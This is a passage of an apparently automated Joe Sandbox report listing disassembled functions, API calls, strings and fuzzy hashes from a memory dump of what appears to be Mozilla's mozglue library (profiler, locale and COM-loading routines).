                                              • Opcode Fuzzy Hash: 6974c831f9aae0f18d1bb659fca1099d6300e6ba6b4764ebe3924406e6a62262
                                              • Instruction Fuzzy Hash: 5941B6B6E001159FCB04DF68DC40EAEB7B5BB84324F250669EC25E7790E731AD1587D2
                                              APIs
                                              • moz_xmalloc.MOZGLUE(6C545104), ref: 6C4CEFAC
                                              • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C4CEFD7
                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4CEFEC
                                              • free.MOZGLUE(?), ref: 6C4CF00C
                                              • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C4CF02E
                                              • memcpy.VCRUNTIME140(00000000,?), ref: 6C4CF041
                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4CF065
                                              • moz_xmalloc.MOZGLUE ref: 6C4CF072
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                              • String ID:
                                              • API String ID: 1148890222-0
                                              • Opcode ID: 08398115a2719753b236a4628fda8095f99194d29bdc0eb9a41f8740584f8f0f
                                              • Instruction ID: aed4614f8cb0bf49466972a45fe6d6af8ab50779806cbc867b8f4e3e66ef52f1
                                              • Opcode Fuzzy Hash: 08398115a2719753b236a4628fda8095f99194d29bdc0eb9a41f8740584f8f0f
                                              • Instruction Fuzzy Hash: 1B41F4B5B002159FDB08CF68DC81DAE73A5AF85324B24422CE815DB7A4EB31E915C7E2
                                              APIs
                                              • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C53B5B9
                                              • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C53B5C5
                                              • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C53B5DA
                                              • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C53B5F4
                                              • __Init_thread_footer.LIBCMT ref: 6C53B605
                                              • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C53B61F
                                              • std::_Facet_Register.LIBCPMT ref: 6C53B631
                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C53B655
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                              • String ID:
                                              • API String ID: 1276798925-0
                                              • Opcode ID: 5c7e7f6040d01d0b6a51d4678d51ae8a0c8e869a6fbbfe96270864efad799a6e
                                              • Instruction ID: 47cd3baeb995316265fa50a77d615ed2a0218c02592f210c2014781d2a1f70b4
                                              • Opcode Fuzzy Hash: 5c7e7f6040d01d0b6a51d4678d51ae8a0c8e869a6fbbfe96270864efad799a6e
                                              • Instruction Fuzzy Hash: 7D31C471B00614CBCB00FB68CC589AEB7B5EF86328B164569D91697741EB30A806CBE5
                                              APIs
                                                • Part of subcall function 6C4FFA80: GetCurrentThreadId.KERNEL32 ref: 6C4FFA8D
                                                • Part of subcall function 6C4FFA80: AcquireSRWLockExclusive.KERNEL32(6C54F448), ref: 6C4FFA99
                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C506727
                                              • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C5067C8
                                                • Part of subcall function 6C514290: memcpy.VCRUNTIME140(?,?,6C522003,6C520AD9,?,6C520AD9,00000000,?,6C520AD9,?,00000004,?,6C521A62,?,6C522003,?), ref: 6C5142C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                              • String ID: data$vTl
                                              • API String ID: 511789754-3361086480
                                              • Opcode ID: 844940a15a622365cbdb8f850fe90b1a5f8eab9c5b21b810de877c762dcea401
                                              • Instruction ID: 06cbdf3d92c1f121d7ab82c4e42590cd6a52b9c2171f0a474fe3945da6b3104a
                                              • Opcode Fuzzy Hash: 844940a15a622365cbdb8f850fe90b1a5f8eab9c5b21b810de877c762dcea401
                                              • Instruction Fuzzy Hash: 91D17B75A083408BD724DF24DC55B9FB7E5AFC5308F10892DE989C7B91EB30A949CB92
                                              APIs
                                              • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C4CEB57,?,?,?,?,?,?,?,?,?), ref: 6C4FD652
                                              • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C4CEB57,?), ref: 6C4FD660
                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C4CEB57,?), ref: 6C4FD673
                                              • free.MOZGLUE(?), ref: 6C4FD888
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: free$memsetmoz_xmalloc
                                              • String ID: WLl$|Enabled
                                              • API String ID: 4142949111-3222281269
                                              • Opcode ID: 60fdffd6e4882c2141a33e784fcb698432ea353e84377e90770f7db61d80ba52
                                              • Instruction ID: c681d940e92ee2ef5ec08376ad77b0042ab56ad4d46d423151e60bf1cfaea8e2
                                              • Opcode Fuzzy Hash: 60fdffd6e4882c2141a33e784fcb698432ea353e84377e90770f7db61d80ba52
                                              • Instruction Fuzzy Hash: 43A10870A003588FDB11DF69C890FAEBBF1AF89318F14815DD8A96B741D731A946CBA1
                                              APIs
                                              • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C51CC83,?,?,?,?,?,?,?,?,?,6C51BCAE,?,?,6C50DC2C), ref: 6C4DB7E6
                                              • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C51CC83,?,?,?,?,?,?,?,?,?,6C51BCAE,?,?,6C50DC2C), ref: 6C4DB80C
                                              • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C51CC83,?,?,?,?,?,?,?,?,?,6C51BCAE), ref: 6C4DB88E
                                              • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C51CC83,?,?,?,?,?,?,?,?,?,6C51BCAE,?,?,6C50DC2C), ref: 6C4DB896
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                              • String ID:
                                              • API String ID: 922945588-0
                                              • Opcode ID: 6d11fb33e1264e9a676c2f2d9ae679a4896a9ef6f910da02b4982f12dafb19dd
                                              • Instruction ID: 1f7bbe28d9d4c632ef3ae8a5a8ef81cc4d6218f101480a17fe23b81137d1fcdc
                                              • Opcode Fuzzy Hash: 6d11fb33e1264e9a676c2f2d9ae679a4896a9ef6f910da02b4982f12dafb19dd
                                              • Instruction Fuzzy Hash: 18516C357006008FCB15EF59C8A4E6AB7F5FF89319B5A859DE99A87351C731F802CB84
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 6C511D0F
                                              • AcquireSRWLockExclusive.KERNEL32(?,?,6C511BE3,?,?,6C511D96,00000000), ref: 6C511D18
                                              • ReleaseSRWLockExclusive.KERNEL32(?,?,6C511BE3,?,?,6C511D96,00000000), ref: 6C511D4C
                                              • GetCurrentThreadId.KERNEL32 ref: 6C511DB7
                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C511DC0
                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C511DDA
                                                • Part of subcall function 6C511EF0: GetCurrentThreadId.KERNEL32 ref: 6C511F03
                                                • Part of subcall function 6C511EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C511DF2,00000000,00000000), ref: 6C511F0C
                                                • Part of subcall function 6C511EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C511F20
                                              • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C511DF4
                                                • Part of subcall function 6C4DCA10: malloc.MOZGLUE(?), ref: 6C4DCA26
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                              • String ID:
                                              • API String ID: 1880959753-0
                                              • Opcode ID: 41cc1f79361a203de254af325ce7c7ee6681320d586e3dab08359297b45ad586
                                              • Instruction ID: b787d7fbf2af96f10f10e10376c607ab208bbd87c26e0217db0222229b6564e0
                                              • Opcode Fuzzy Hash: 41cc1f79361a203de254af325ce7c7ee6681320d586e3dab08359297b45ad586
                                              • Instruction Fuzzy Hash: BA417B752007049FDB10EF29C888B5ABBF5FB89318F11846EE95A87B41DB71F814CB95
                                              APIs
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5084F3
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C50850A
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C50851E
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C50855B
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C50856F
                                              • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5085AC
                                                • Part of subcall function 6C507670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C5085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C50767F
                                                • Part of subcall function 6C507670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C5085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C507693
                                                • Part of subcall function 6C507670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C5085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5076A7
                                              • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5085B2
                                                • Part of subcall function 6C4E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C4E5EDB
                                                • Part of subcall function 6C4E5E90: memset.VCRUNTIME140(ewRl,000000E5,?), ref: 6C4E5F27
                                                • Part of subcall function 6C4E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C4E5FB2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                              • String ID:
                                              • API String ID: 2666944752-0
                                              • Opcode ID: 1c932b1e7f8c195a8e0855a72fbbd892501740d1d66a6bedbe65f88e1ab7da46
                                              • Instruction ID: 52a2ce4d82a7bd56360f73adc677f6d8fb7ab1159c24d2a78964a3282db628dd
                                              • Opcode Fuzzy Hash: 1c932b1e7f8c195a8e0855a72fbbd892501740d1d66a6bedbe65f88e1ab7da46
                                              • Instruction Fuzzy Hash: C82148743016019BDB24DB28CC88E6AB7A5AF8430DF25482DE55BC3B42EB31F948CB56
                                              APIs
                                              • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C4D1699
                                              • VerSetConditionMask.NTDLL ref: 6C4D16CB
                                              • VerSetConditionMask.NTDLL ref: 6C4D16D7
                                              • VerSetConditionMask.NTDLL ref: 6C4D16DE
                                              • VerSetConditionMask.NTDLL ref: 6C4D16E5
                                              • VerSetConditionMask.NTDLL ref: 6C4D16EC
                                              • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C4D16F9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ConditionMask$InfoVerifyVersionmemset
                                              • String ID:
                                              • API String ID: 375572348-0
                                              • Opcode ID: 146705a052650c1556d52972fd2ef6b5fd09f71f4cd0543811c6c5a14a0118f1
                                              • Instruction ID: d87de7e2ba38a2db5308d11580ade8b6563f26f1c67a6d621ce6f5fe124139d4
                                              • Opcode Fuzzy Hash: 146705a052650c1556d52972fd2ef6b5fd09f71f4cd0543811c6c5a14a0118f1
                                              • Instruction Fuzzy Hash: 7121D5B07402086FEB11BA688C45FBFB3BCDFC6714F018528F6459B5C1D678AD54C6A5
                                              APIs
                                                • Part of subcall function 6C4FCBE8: GetCurrentProcess.KERNEL32(?,6C4C31A7), ref: 6C4FCBF1
                                                • Part of subcall function 6C4FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4C31A7), ref: 6C4FCBFA
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4D4A68), ref: 6C50945E
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C509470
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C509482
                                                • Part of subcall function 6C509420: __Init_thread_footer.LIBCMT ref: 6C50949F
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F619
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C50F598), ref: 6C50F621
                                                • Part of subcall function 6C5094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5094EE
                                                • Part of subcall function 6C5094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C509508
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F637
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8,?,?,00000000,?,6C50F598), ref: 6C50F645
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8,?,?,00000000,?,6C50F598), ref: 6C50F663
                                              Strings
                                              • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C50F62A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                              • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                              • API String ID: 1579816589-753366533
                                              • Opcode ID: 94a57490cfe5bbb1065cca30eefa941354f97b9a31f732bb60a6902f7b4e3397
                                              • Instruction ID: bd0d140c84b86d4543ad0de97354a15ffcd657d70c1d41aaf4001bcd4e6415d8
                                              • Opcode Fuzzy Hash: 94a57490cfe5bbb1065cca30eefa941354f97b9a31f732bb60a6902f7b4e3397
                                              • Instruction Fuzzy Hash: 0A119175301604ABCA04BF59DD48DA9B779FBC636CF514115EA05C7F01CB72AC25CBA8
                                              APIs
                                                • Part of subcall function 6C4FAB89: EnterCriticalSection.KERNEL32(6C54E370,?,?,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284), ref: 6C4FAB94
                                                • Part of subcall function 6C4FAB89: LeaveCriticalSection.KERNEL32(6C54E370,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4FABD1
                                              • LoadLibraryW.KERNEL32(combase.dll,6C4D1C5F), ref: 6C4D20AE
                                              • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C4D20CD
                                              • __Init_thread_footer.LIBCMT ref: 6C4D20E1
                                              • FreeLibrary.KERNEL32 ref: 6C4D2124
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                              • String ID: CoInitializeSecurity$combase.dll
                                              • API String ID: 4190559335-2476802802
                                              • Opcode ID: 4575c47bba68d62239885f294814ac86ac55df6d1994d94e0272fb99120efbb1
                                              • Instruction ID: 3f62e060438adc850d76b9ab86dbc1178a756612badc19ac49afebf407cad563
                                              • Opcode Fuzzy Hash: 4575c47bba68d62239885f294814ac86ac55df6d1994d94e0272fb99120efbb1
                                              • Instruction Fuzzy Hash: 2F216D76200209AFDF11EF59DC58ECA3B76FB4A319F128114FA1492611D731A862DFA5
                                              APIs
                                              • WideCharToMultiByte.KERNEL32 ref: 6C5276F2
                                              • moz_xmalloc.MOZGLUE(00000001), ref: 6C527705
                                                • Part of subcall function 6C4DCA10: malloc.MOZGLUE(?), ref: 6C4DCA26
                                              • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C527717
                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C52778F,00000000,00000000,00000000,00000000), ref: 6C527731
                                              • free.MOZGLUE(00000000), ref: 6C527760
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                              • String ID: }>Pl
                                              • API String ID: 2538299546-1750802400
                                              • Opcode ID: 95ca795c6c595b5f4554625c72faa651ea1f7247b4a5a513bb8c5265b8f81853
                                              • Instruction ID: b4b19e0a4c311405bffabfe6276d68b88a71da124436876c7c7ba3e7411f77a7
                                              • Opcode Fuzzy Hash: 95ca795c6c595b5f4554625c72faa651ea1f7247b4a5a513bb8c5265b8f81853
                                              • Instruction Fuzzy Hash: C31193B19012256BDB10AF65DC44B6B7EF8EF45354F044529F88897340E774984087E2
                                              APIs
                                                • Part of subcall function 6C4FAB89: EnterCriticalSection.KERNEL32(6C54E370,?,?,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284), ref: 6C4FAB94
                                                • Part of subcall function 6C4FAB89: LeaveCriticalSection.KERNEL32(6C54E370,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4FABD1
                                              • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C4D1FDE
                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C4D1FFD
                                              • __Init_thread_footer.LIBCMT ref: 6C4D2011
                                              • FreeLibrary.KERNEL32 ref: 6C4D2059
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                              • String ID: CoCreateInstance$combase.dll
                                              • API String ID: 4190559335-2197658831
                                              • Opcode ID: 2c2f1a787647bc849da00a2b336ba7860becea791c9f8d8b3f347c66174c9684
                                              • Instruction ID: 845b315042c81912239925d68e439c65305bdd6584dd06f9ef935133e4c6e29d
                                              • Opcode Fuzzy Hash: 2c2f1a787647bc849da00a2b336ba7860becea791c9f8d8b3f347c66174c9684
                                              • Instruction Fuzzy Hash: 44117F75200205AFDF21FF19CC5CE9B3B79EB8635EF02C219EA1492741DB31A811DBA5
                                              APIs
                                                • Part of subcall function 6C4FAB89: EnterCriticalSection.KERNEL32(6C54E370,?,?,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284), ref: 6C4FAB94
                                                • Part of subcall function 6C4FAB89: LeaveCriticalSection.KERNEL32(6C54E370,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4FABD1
                                              • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C4FD9F0,00000000), ref: 6C4D0F1D
                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C4D0F3C
                                              • __Init_thread_footer.LIBCMT ref: 6C4D0F50
                                              • FreeLibrary.KERNEL32(?,6C4FD9F0,00000000), ref: 6C4D0F86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                              • String ID: CoInitializeEx$combase.dll
                                              • API String ID: 4190559335-2063391169
                                              • Opcode ID: 0a1288aaea85f6069c049cf17c8673bdab82005eb694588ffbf867c34e4eb66a
                                              • Instruction ID: 317f62715e5e06b0d37166cca9e641687568d8e65a0b02bbfe2ab8adce58fbaa
                                              • Opcode Fuzzy Hash: 0a1288aaea85f6069c049cf17c8673bdab82005eb694588ffbf867c34e4eb66a
                                              • Instruction Fuzzy Hash: DC118C742052409BDF04FF58CD18E8E3774EB8A32AF538329E90593742D770A405CE5A
                                              APIs
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4D4A68), ref: 6C50945E
